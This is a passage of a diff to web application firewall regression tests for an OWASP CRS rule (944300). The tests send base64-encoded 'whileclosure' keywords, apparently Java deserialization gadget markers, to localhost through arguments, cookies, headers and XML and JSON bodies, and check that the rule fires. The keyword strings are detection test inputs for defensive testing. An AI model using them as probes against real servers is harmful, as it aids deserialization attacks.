User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: d2hpbGVjbG9zdXJl=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 302 desc: "Request header test includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: d2hpbGVjbG9zdXJl - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-303 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: d2hpbGVjbG9zdXJl + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 303 desc: "XML attribute value includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-304 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 304 desc: "XML element value includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "d2hpbGVjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-305 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "d2hpbGVjbG9zdXJl" + output: + log: + expect_ids: [944300] + - test_id: 305 desc: "Nested XML element value includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "d2hpbGVjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-306 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "d2hpbGVjbG9zdXJl" + output: + log: + expect_ids: [944300] + - test_id: 306 desc: "Content-Type text/plain includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=d2hpbGVjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-307 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=d2hpbGVjbG9zdXJl" + output: + log: + expect_ids: [944300] + - test_id: 307 desc: "Content-Type application/json arg value includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"d2hpbGVjbG9zdXJl\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-308 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"d2hpbGVjbG9zdXJl\"}" + output: + log: + expect_ids: [944300] + - test_id: 308 desc: "Content-Type application/json arg name includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"d2hpbGVjbG9zdXJl\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-309 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"d2hpbGVjbG9zdXJl\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 309 desc: "Argument test includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HdoaWxlY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-310 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HdoaWxlY2xvc3VyZQ" + output: + log: + expect_ids: [944300] + - test_id: 310 desc: "Argument name includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HdoaWxlY2xvc3VyZQ=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-311 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HdoaWxlY2xvc3VyZQ=test" + output: + log: + expect_ids: [944300] + - test_id: 311 desc: "Cookie test includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=HdoaWxlY2xvc3VyZQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-312 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HdoaWxlY2xvc3VyZQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 312 desc: "Cookie name includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: HdoaWxlY2xvc3VyZQ=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-313 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HdoaWxlY2xvc3VyZQ=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 313 desc: "Request header test includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: HdoaWxlY2xvc3VyZQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-314 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HdoaWxlY2xvc3VyZQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 314 desc: "XML attribute value includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-315 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 315 desc: "XML element value includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HdoaWxlY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-316 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HdoaWxlY2xvc3VyZQ" + output: + log: + expect_ids: [944300] + - test_id: 316 desc: "Nested XML element value includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HdoaWxlY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-317 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HdoaWxlY2xvc3VyZQ" + output: + log: + expect_ids: [944300] + - test_id: 317 desc: "Content-Type text/plain includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HdoaWxlY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-318 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HdoaWxlY2xvc3VyZQ" + output: + log: + expect_ids: [944300] + - test_id: 318 desc: "Content-Type application/json arg value includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"HdoaWxlY2xvc3VyZQ\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-319 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"HdoaWxlY2xvc3VyZQ\"}" + output: + log: + expect_ids: [944300] + - test_id: 319 desc: "Content-Type application/json arg name includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"HdoaWxlY2xvc3VyZQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-320 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"HdoaWxlY2xvc3VyZQ\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 320 desc: "Argument test includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=B3aGlsZWNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-321 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=B3aGlsZWNsb3N1cmU" + output: + log: + expect_ids: [944300] + - test_id: 321 desc: "Argument name includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "B3aGlsZWNsb3N1cmU=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-322 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "B3aGlsZWNsb3N1cmU=test" + output: + log: + expect_ids: [944300] + - test_id: 322 desc: "Cookie test includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=B3aGlsZWNsb3N1cmU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-323 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=B3aGlsZWNsb3N1cmU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 323 desc: "Cookie name includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: B3aGlsZWNsb3N1cmU=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-324 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: B3aGlsZWNsb3N1cmU=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 324 desc: "Request header test includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: B3aGlsZWNsb3N1cmU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-325 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: B3aGlsZWNsb3N1cmU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 325 desc: "XML attribute value includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-326 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 326 desc: "XML element value includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "B3aGlsZWNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-327 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "B3aGlsZWNsb3N1cmU" + output: + log: + expect_ids: [944300] + - test_id: 327 desc: "Nested XML element value includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "B3aGlsZWNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-328 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "B3aGlsZWNsb3N1cmU" + output: + log: + expect_ids: [944300] + - test_id: 328 desc: "Content-Type text/plain includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=B3aGlsZWNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-329 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 